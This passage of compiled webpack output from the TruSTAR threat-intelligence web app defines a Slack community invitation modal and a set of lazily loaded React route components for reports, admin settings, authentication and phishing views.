SlackCommunityChatModal.defaultProps = initialValues;
var StyledModalBottomButtonBar = Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components_Button_ButtonGroup__["a" /* default */]).withConfig({
  displayName: 'SlackCommunityChatModal__StyledModalBottomButtonBar',
  componentId: 'sc-173op71-1'
})(['width:100%;padding:0 1rem 1rem 1rem;']);

var StyledSupportLinkBox = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'SlackCommunityChatModal__StyledSupportLinkBox',
  componentId: 'sc-173op71-2'
})(['flex-grow:1;']);

var SupportLinkBox = function SupportLinkBox() {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledSupportLinkBox,
    null,
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'a',
      { href: __WEBPACK_IMPORTED_MODULE_10_modules_app_constants__["TRUSTAR_SUPPORT_PAGE"], target: '_blank' },
      ' Contact Support '
    )
  );
};

// These statuses will also provide the user with a link to contact support
var supportWorthyStatuses = Object(__WEBPACK_IMPORTED_MODULE_13_immutable__["List"])(['USER_DISABLED', 'USER_ALREADY_INVITED', 'ERROR']);

var ModalBottomButtonBar = function ModalBottomButtonBar(props) {
  var onExitModal = props.onExitModal,
      goToSlackCommunity = props.goToSlackCommunity,
      slackInvitationStatus = props.slackInvitationStatus;

  var allowResend = slackInvitationStatus.status === __WEBPACK_IMPORTED_MODULE_9_modules_chat_constants__["b" /* USER_STATUSES_FOR_SLACK_COMMUNITY */].USER_ALREADY_INVITED && !slackInvitationStatus.resendAlreadyClicked;
  var allowFiringARequest = allowResend || !statusMessagesToUser[slackInvitationStatus.status];

  // Hmm maybe refactor statuses
  var showSupportLink = supportWorthyStatuses.includes(slackInvitationStatus.status);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledModalBottomButtonBar,
    { block: true, alignRight: true },
    showSupportLink && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(SupportLinkBox, null),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_components_Button__["a" /* Button */],
      { buttonType: 'secondary', fill: 'none', onClick: onExitModal },
      ' ',
      allowFiringARequest ? 'Cancel' : 'Close',
      ' '
    ),
    allowFiringARequest && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_components_Button__["a" /* Button */],
      { onClick: function onClick() {
          return goToSlackCommunity(allowResend);
        } },
      ' ',
      allowResend ? 'Resend E-mail' : 'Go to Community Chat',
      ' '
    )
  );
};

var AdditionalInformation = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].span.withConfig({
  displayName: 'SlackCommunityChatModal__AdditionalInformation',
  componentId: 'sc-173op71-3'
})(['display:block;font-size:1.2rem;']);

var statusMessagesToUser = {
  INVITE_SENT: 'An invite has been sent to your e-mail address, please check for it and click on the link provided.',
  // eslint-disable-next-line react/display-name
  USER_ALREADY_EXISTS: function USER_ALREADY_EXISTS(workspaceUrl) {
    return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'span',
      null,
      ' You already signed up to slack workspace, please go to ',
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'a',
        { target: '_blank', href: workspaceUrl },
        workspaceUrl
      ),
      '.'
    );
  },
  USER_ALREADY_INVITED: 'An invite has already been sent to your e-mail address, please check your spam folders and if the problem persists contact support.',
  USER_DISABLED: 'This user has been disabled from the workspace and cannot join.',
  ERROR: 'An error occurred while sending the request, please try again or contact support.',
  DEFAULT: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'span',
    null,
    'Go to TruSTAR Community Slack Channel? ',
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      AdditionalInformation,
      null,
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].NOTIFICATION_CIRCLE }),
      ' First time users will receive an invite to their e-mail address '
    )
  )
};

var mapState = function mapState(state) {
  return {
    joinRequestInProgress: __WEBPACK_IMPORTED_MODULE_7_modules_chat_getters__["a" /* joinRequestInProgress */](state),
    slackInvitationStatus: __WEBPACK_IMPORTED_MODULE_7_modules_chat_getters__["b" /* slackInvitationStatus */](state)
  };
};

var dispatchProps = {
  requestToJoinCommunityChat: __WEBPACK_IMPORTED_MODULE_6_modules_chat_actions__["a" /* requestToJoinCommunityChat */],
  resetChatModal: __WEBPACK_IMPORTED_MODULE_6_modules_chat_actions__["b" /* resetChatModal */]
};

var connectedModal = Object(__WEBPACK_IMPORTED_MODULE_1_react_redux__["connect"])(mapState, dispatchProps)(SlackCommunityChatModal);



/***/ }),
/* 3679 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return CreateContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return ErrorView; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "P", function() { return UpdateContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return CreateForm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "F", function() { return Review; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return CreateIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "I", function() { return SettingsContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ApiSettingsContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return EmailSettingsContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "w", function() { return MarketplaceContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "C", function() { return ProfileSettings; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "D", function() { return RedactionLibrary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return CompanyWhitelist; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return CompaniesContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "J", function() { return SharingGroupsContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "L", function() { return TemplatesContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "K", function() { return SubscriptionsContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return EnclavesContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Q", function() { return UsersContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return EntitiesBrowser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return GlobalWhitelist; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return ConstellationContainerV2; });
/* unused harmony export Browse */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "v", function() { return MalwareContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "O", function() { return ThreatActorsContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "E", function() { return ReportBrowser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return CaseBrowser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "H", function() { return SearchBrowser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "A", function() { return PageContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return About; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return Help; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "M", function() { return Terms; });
/* unused harmony export Tours */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "y", function() { return NotFound; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "t", function() { return Login; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "u", function() { return Logout; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return EnsureLogin; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "x", function() { return Mfa; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "N", function() { return TermsAgreement; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return CreatePassword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return ForgotPassword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "G", function() { return SSOReceiver; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return AuthContainer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "z", function() { return NotificationSettings; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "B", function() { return PhishingView; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__components_BundleLoader_js__ = __webpack_require__(3680);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_bundle_loader_lazy_components_create_reports_Create_js__ = __webpack_require__(3683);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_bundle_loader_lazy_components_create_reports_Create_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_bundle_loader_lazy_components_create_reports_Create_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_bundle_loader_lazy_components_constellation_views_ConstellationView_js__ = __webpack_require__(3684);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_bundle_loader_lazy_components_constellation_views_ConstellationView_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_bundle_loader_lazy_components_constellation_views_ConstellationView_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_bundle_loader_lazy_components_browse_Browse_js__ = __webpack_require__(4038);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_bundle_loader_lazy_components_browse_Browse_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_bundle_loader_lazy_components_browse_Browse_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_bundle_loader_lazy_components_browse_EntitiesBrowser_EntitiesBrowser_js__ = __webpack_require__(4039);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_bundle_loader_lazy_components_browse_EntitiesBrowser_EntitiesBrowser_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_bundle_loader_lazy_components_browse_EntitiesBrowser_EntitiesBrowser_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_bundle_loader_lazy_components_browse_ReportsBrowser_ReportBrowser_js__ = __webpack_require__(4040);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_bundle_loader_lazy_components_browse_ReportsBrowser_ReportBrowser_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_bundle_loader_lazy_components_browse_ReportsBrowser_ReportBrowser_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_bundle_loader_lazy_components_browse_CaseBrowser_js__ = __webpack_require__(4041);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_bundle_loader_lazy_components_browse_CaseBrowser_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_bundle_loader_lazy_components_browse_CaseBrowser_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_bundle_loader_lazy_components_browse_SearchBrowser_SearchBrowser_js__ = __webpack_require__(4042);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_bundle_loader_lazy_components_browse_SearchBrowser_SearchBrowser_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_bundle_loader_lazy_components_browse_SearchBrowser_SearchBrowser_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_bundle_loader_lazy_trustar_components_Pages_Pages_js__ = __webpack_require__(4043);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_bundle_loader_lazy_trustar_components_Pages_Pages_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_bundle_loader_lazy_trustar_components_Pages_Pages_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_bundle_loader_lazy_components_admin_Companies_js__ = __webpack_require__(4044);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_bundle_loader_lazy_components_admin_Companies_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_10_bundle_loader_lazy_components_admin_Companies_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_bundle_loader_lazy_components_admin_SharingGroups_js__ = __webpack_require__(4045);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_bundle_loader_lazy_components_admin_SharingGroups_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_11_bundle_loader_lazy_components_admin_SharingGroups_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_bundle_loader_lazy_components_admin_Templates_js__ = __webpack_require__(4046);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_bundle_loader_lazy_components_admin_Templates_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_12_bundle_loader_lazy_components_admin_Templates_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_bundle_loader_lazy_components_admin_Subscriptions_js__ = __webpack_require__(4047);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_bundle_loader_lazy_components_admin_Subscriptions_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_13_bundle_loader_lazy_components_admin_Subscriptions_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_bundle_loader_lazy_components_admin_Enclaves_js__ = __webpack_require__(4048);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_bundle_loader_lazy_components_admin_Enclaves_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_14_bundle_loader_lazy_components_admin_Enclaves_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_bundle_loader_lazy_components_admin_Users_js__ = __webpack_require__(4049);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_bundle_loader_lazy_components_admin_Users_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_15_bundle_loader_lazy_components_admin_Users_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_bundle_loader_lazy_components_admin_iocs_MalwareSettings_js__ = __webpack_require__(4050);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_bundle_loader_lazy_components_admin_iocs_MalwareSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_16_bundle_loader_lazy_components_admin_iocs_MalwareSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_bundle_loader_lazy_components_admin_iocs_ThreatActorSettings_js__ = __webpack_require__(4051);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_bundle_loader_lazy_components_admin_iocs_ThreatActorSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_17_bundle_loader_lazy_components_admin_iocs_ThreatActorSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_bundle_loader_lazy_components_admin_iocs_GlobalWhitelistSettings_js__ = __webpack_require__(4052);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_bundle_loader_lazy_components_admin_iocs_GlobalWhitelistSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_18_bundle_loader_lazy_components_admin_iocs_GlobalWhitelistSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19_bundle_loader_lazy_components_admin_iocs_CompanyWhitelistSettings_js__ = __webpack_require__(4053);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19_bundle_loader_lazy_components_admin_iocs_CompanyWhitelistSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_19_bundle_loader_lazy_components_admin_iocs_CompanyWhitelistSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20_bundle_loader_lazy_components_settings_Settings_js__ = __webpack_require__(4054);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20_bundle_loader_lazy_components_settings_Settings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_20_bundle_loader_lazy_components_settings_Settings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_21_bundle_loader_lazy_components_settings_ApiSettings_js__ = __webpack_require__(4055);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_21_bundle_loader_lazy_components_settings_ApiSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_21_bundle_loader_lazy_components_settings_ApiSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_22_bundle_loader_lazy_components_settings_EmailSettings_js__ = __webpack_require__(4056);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_22_bundle_loader_lazy_components_settings_EmailSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_22_bundle_loader_lazy_components_settings_EmailSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_23_bundle_loader_lazy_components_settings_Marketplace_js__ = __webpack_require__(4057);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_23_bundle_loader_lazy_components_settings_Marketplace_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_23_bundle_loader_lazy_components_settings_Marketplace_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_24_bundle_loader_lazy_components_settings_ProfileSettings_js__ = __webpack_require__(4058);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_24_bundle_loader_lazy_components_settings_ProfileSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_24_bundle_loader_lazy_components_settings_ProfileSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_25_bundle_loader_lazy_components_settings_RedactionLibrary_js__ = __webpack_require__(4059);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_25_bundle_loader_lazy_components_settings_RedactionLibrary_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_25_bundle_loader_lazy_components_settings_RedactionLibrary_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_26_bundle_loader_lazy_components_create_reports_CreateForm_js__ = __webpack_require__(4060);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_26_bundle_loader_lazy_components_create_reports_CreateForm_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_26_bundle_loader_lazy_components_create_reports_CreateForm_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_27_bundle_loader_lazy_components_create_reports_Review_js__ = __webpack_require__(4061);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_27_bundle_loader_lazy_components_create_reports_Review_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_27_bundle_loader_lazy_components_create_reports_Review_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_28_bundle_loader_lazy_components_create_indicators_CreateIndicators_js__ = __webpack_require__(4062);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_28_bundle_loader_lazy_components_create_indicators_CreateIndicators_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_28_bundle_loader_lazy_components_create_indicators_CreateIndicators_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_29_bundle_loader_lazy_components_auth_views_Login_js__ = __webpack_require__(4063);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_29_bundle_loader_lazy_components_auth_views_Login_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_29_bundle_loader_lazy_components_auth_views_Login_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_30_bundle_loader_lazy_components_auth_views_Logout_js__ = __webpack_require__(4064);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_30_bundle_loader_lazy_components_auth_views_Logout_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_30_bundle_loader_lazy_components_auth_views_Logout_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_31_bundle_loader_lazy_components_auth_views_EnsureLogin_js__ = __webpack_require__(4065);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_31_bundle_loader_lazy_components_auth_views_EnsureLogin_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_31_bundle_loader_lazy_components_auth_views_EnsureLogin_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_32_bundle_loader_lazy_components_auth_views_Mfa_js__ = __webpack_require__(4066);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_32_bundle_loader_lazy_components_auth_views_Mfa_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_32_bundle_loader_lazy_components_auth_views_Mfa_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_33_bundle_loader_lazy_components_auth_views_TermsAgreement_js__ = __webpack_require__(4067);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_33_bundle_loader_lazy_components_auth_views_TermsAgreement_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_33_bundle_loader_lazy_components_auth_views_TermsAgreement_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_34_bundle_loader_lazy_components_auth_views_CreatePassword_js__ = __webpack_require__(4068);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_34_bundle_loader_lazy_components_auth_views_CreatePassword_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_34_bundle_loader_lazy_components_auth_views_CreatePassword_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_35_bundle_loader_lazy_components_auth_views_ForgotPassword_js__ = __webpack_require__(4069);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_35_bundle_loader_lazy_components_auth_views_ForgotPassword_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_35_bundle_loader_lazy_components_auth_views_ForgotPassword_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_36_bundle_loader_lazy_components_auth_views_AuthContainer_js__ = __webpack_require__(4070);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_36_bundle_loader_lazy_components_auth_views_AuthContainer_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_36_bundle_loader_lazy_components_auth_views_AuthContainer_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_37_bundle_loader_lazy_components_settings_NotificationSettings_js__ = __webpack_require__(4071);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_37_bundle_loader_lazy_components_settings_NotificationSettings_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_37_bundle_loader_lazy_components_settings_NotificationSettings_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_38_bundle_loader_lazy_components_auth_views_SSOReceiver_js__ = __webpack_require__(4072);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_38_bundle_loader_lazy_components_auth_views_SSOReceiver_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_38_bundle_loader_lazy_components_auth_views_SSOReceiver_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_39_bundle_loader_lazy_components_errors_ErrorView_js__ = __webpack_require__(4073);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_39_bundle_loader_lazy_components_errors_ErrorView_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_39_bundle_loader_lazy_components_errors_ErrorView_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_40_bundle_loader_lazy_components_phishing_views_ConnectedPhishingView_js__ = __webpack_require__(4074);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_40_bundle_loader_lazy_components_phishing_views_ConnectedPhishingView_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_40_bundle_loader_lazy_components_phishing_views_ConnectedPhishingView_js__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }












































/**
 * Lazily load a bundle provided by the webpack bundle-loader. Bundles imported
 * with bundle-loader are functions. They take one argument which is a callback
 * that will be called with the component once loaded.
 */

var Bundle = function (_React$Component) {
  _inherits(Bundle, _React$Component);

  function Bundle() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, Bundle);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = Bundle.__proto__ || Object.getPrototypeOf(Bundle)).call.apply(_ref, [this].concat(args))), _this), _this.state = {
      mod: null
    }, _this.mounted = true, _temp), _possibleConstructorReturn(_this, _ret);
  }

  // short for "module" but that's a keyword in js, so "mod"


  // Default to true to avoid unforseen breakage (might be hard to debug by
  // anyone unaware of the lazy loading). React should handle not allowing
  // setState _before_ mount, but we need to make sure our async callbacks
  // aren't called _after unmount_. Therefore we only update this in
  // componentWillUnmount


  _createClass(Bundle, [{
    key: 'componentWillMount',
    value: function componentWillMount() {
      this.load(this.props);
    }
  }, {
    key: 'componentDidMount',
    value: function componentDidMount() {
      this.mounted = true;
    }
  }, {
    key: 'componentWillReceiveProps',
    value: function componentWillReceiveProps(nextProps) {
      if (nextProps.load !== this.props.load) {
        this.load(nextProps);
      }
    }
  }, {
    key: 'componentWillUnmount',
    value: function componentWillUnmount() {
      this.mounted = false;
    }
  }, {
    key: 'load',
    value: function load(props) {
      var _this2 = this;

      this.setState(function () {
        return { mod: null };
      });
      props.load(function (mod) {
        if (_this2.mounted) {
          _this2.setState(function () {
            return {
              // handle both es imports and cjs
              mod: mod.default ? mod.default : mod
            };
          });
        }
      });
    }
  }, {
    key: 'render',
    value: function render() {
      return this.state.mod ? this.props.children(this.state.mod) : __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_1__components_BundleLoader_js__["a" /* default */], null);
    }
  }]);

  return Bundle;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

/**
 * The Bundles. These are... repetitive. But creating a wrapper function results
 * in React being unable to resolve a component name, so for now this is what's
 * happening.
 */


var CreateContainer = function CreateContainer(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    Bundle,
    { load: __WEBPACK_IMPORTED_MODULE_2_bundle_loader_lazy_components_create_reports_Create_js___default.a },
    function (Comp) {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](Comp.CreateContainer, props);
    }
  );
};

var ErrorView = function ErrorView(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    Bundle,
    { load: __WEBPACK_IMPORTED_MODULE_39_bundle_loader_lazy_components_errors_ErrorView_js___default.a },
    function (Comp) {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](Comp, props);
    }
  );
};

var UpdateContainer = function UpdateContainer(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    Bundle,
    { load: __WEBPACK_IMPORTED_MODULE_2_bundle_loader_lazy_components_create_reports_Create_js___default.a },
    function (Comp) {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](Comp.UpdateContainer, props);
    }
  );
};

var CreateForm = function CreateForm(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    Bundle,
    { load: __WEBPACK_IMPORTED_MODULE_26_bundle_loader_lazy_components_create_reports_CreateForm_js___default.a },
    function (Comp) {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](Comp, props);
    }
  );
};

var Review = function Review(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    Bundle,
    { load: __WEBPACK_IMPORTED_MODULE_27_bundle_loader_lazy_components_create_reports_Review_js___default.a },
    function (Comp) {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](Comp, props);
    }
  );
};

var CreateIndicators = function CreateIndicators(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    Bundle,
    { load: __WEBPACK_IMPORTED_MODULE_28_bundle_loader_lazy_components_create_indicators_CreateIndicators_js___default.a },
    function (Comp) {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](Comp, props);
    }
  );
};

var SettingsContainer = function SettingsContainer(props) {
